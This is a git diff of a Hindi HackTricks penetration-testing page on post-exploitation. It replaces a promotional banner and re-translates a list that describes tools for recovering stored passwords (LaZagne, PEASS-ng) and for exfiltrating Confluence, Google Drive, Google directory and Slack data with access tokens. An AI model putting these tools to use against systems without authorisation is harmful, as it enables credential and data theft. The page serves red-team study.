--- a/todo/post-exploitation.md
+++ b/todo/post-exploitation.md
@@ -1,41 +1,28 @@
-
-
-AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
-
-HackTricks का समर्थन करने के अन्य तरीके:
-
-* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
-* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज़ में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
-
-
-
-
-## **Local l00t**
-
-* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): ये स्क्रिप्ट्स, PE वेक्टर्स की खोज के अलावा, फाइलसिस्टम के अंदर संवेदनशील जानकारी की खोज करेंगी।
-* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne प्रोजेक्ट** एक ओपन सोर्स एप्लिकेशन है जिसका उपयोग एक स्थानीय कंप्यूटर पर संग्रहीत बहुत सारे पासवर्ड्स को पुनः प्राप्त करने के लिए किया जाता है। प्रत्येक सॉफ्टवेयर अपने पासवर्ड्स को विभिन्न तकनीकों (plaintext, APIs, कस्टम एल्गोरिदम, डेटाबेस, आदि) का उपयोग करके संग्रहीत करता है। यह टूल सबसे अधिक प्रयुक्त सॉफ्टवेयर के लिए इन पासवर्ड्स को खोजने के उद्देश्य से विकसित किया गया है।
-
-## **External Services**
-
-* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): यह मॉड्यूल Confluence के API से एक्सेस टोकन का उपयोग करके कनेक्ट होगा, PDF में निर्यात करेगा, और उन Confluence दस्तावेजों को डाउनलोड करेगा जिन तक लक्ष्य की पहुँच है।
-* [**GD-Thief**](https://github.com/antman1p/GD-Thief): यह एक Red Team टूल है जो आपके (हमलावर) द्वारा पहुँच योग्य लक्ष्य के Google Drive से फाइलों को निकालने के लिए Google Drive API का उपयोग करता है। इसमें सभी साझा की गई फाइलें, साझा ड्राइव्स से सभी फाइलें, और डोमेन ड्राइव्स से सभी फाइलें शामिल हैं जिन तक लक्ष्य की पहुँच है।
-* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): यह एक Red Team टूल है जो लक्ष्य संगठन की Google People Directory को निकालने के लिए Google के People API का उपयोग करता है जिस तक आपकी पहुँच है।
-* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** यह एक Python में विकसित टूल है जो एक Slack workspace से 'रोचक' जानकारी निकालने के लिए मूल Slack APIs का उपयोग करता है, बशर्ते एक्सेस टोकन दिया गया हो।
-* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound एक कमांड लाइन टूल है जो लाल और नीली टीमों को एक Slack workspace/संगठन की त्वरित रेकी करने के लिए है। Slackhound एक संगठन के उपयोगकर्ताओं, फाइलों, संदेशों, आदि का संग्रह जल्दी से खोज योग्य बनाता है और बड़ी वस्तुओं को ऑफलाइन समीक्षा के लिए CSV में लिखा जाता है।
+{% hint style="success" %}
+सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
+हैकट्रिक्स का समर्थन करें
-HackTricks का समर्थन करने के अन्य तरीके:
-
-* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
-* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज़ में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
+* [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें।
+* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %}
+
+
+## **स्थानीय लूट**
+
+* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): ये स्क्रिप्ट, PE वेक्टर्स की खोज के अलावा, फाइल सिस्टम के अंदर संवेदनशील जानकारी की खोज करेंगे।
+* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne प्रोजेक्ट** एक ओपन सोर्स एप्लिकेशन है जिसका उपयोग स्थानीय कंप्यूटर पर स्टोर की गई कई पासवर्ड्स को पुनः प्राप्त करने के लिए किया जाता है। प्रत्येक सॉफ्टवेयर अलग-अलग तकनीकों (सादा पाठ, एपीआई, कस्टम एल्गोरिदम्स, डेटाबेस, आदि) का उपयोग करके अपने पासवर्ड्स को स्टोर करता है। इस टूल का विकास इन पासवर्ड्स को खोजने के उद्देश्य से किया गया है जो सबसे अधिक प्रयोग किए जाने वाले सॉफ्टवेयर के लिए है।
+
+## **बाह्य सेवाएं**
+
+* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): यह मॉड्यूल Confluence के एपीआई से कनेक्ट करेगा, पीडीएफ में निर्यात करेगा, और उन Confluence दस्तावेज़ों को डाउनलोड करेगा जिनका लक्ष्य है कि लक्ष्य को पहुंच है।
+* [**GD-Thief**](https://github.com/antman1p/GD-Thief): रेड टीम टूल एक लक्ष्य के Google Drive से फ़ाइलों को बाहर निकालने के लिए जिसका आपको पहुंच है, Google Drive एपीआई के माध्यम से। इसमें सभी साझा की गई फ़ाइलें, साझा ड्राइव से सभी फ़ाइलें, और डोमेन ड्राइव से सभी फ़ाइलें शामिल हैं जिनका लक्ष्य को पहुंच है।
+* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): रेड टीम टूल जिसका उपयोग Google के लोगों के निर्देशिका को बाहर निकालने के लिए किया जाता है, जिसका आपको पहुंच है, Google के लोगों के एपीआई के माध्यम से।
+* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** यह एक टूल है जो Python में विकसित किया गया है जो एक एक्सेस टोकन देता है जिसका उपयोग करके एक स्लैक वर्कस्पेस से 'दिलचस्प' जानकारी निकालने के लिए नेटिव स्लैक एपीआई का उपयोग करता है।
+* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound एक कमांड लाइन टूल है जो रेड और ब्लू टीमों को एक स्लैक वर्कस्पेस/संगठन की जांच तेजी से करने के लिए है। Slackhound एक संगठन के उपयोगकर्ताओं, फ़ाइलों, संदेशों आदि का संग्रहण तेजी से खोजने में मदद करता है और बड़े ऑब्जेक्ट्स को CSV में लिखा जाता है ऑफलाइन समीक्षा के लिए।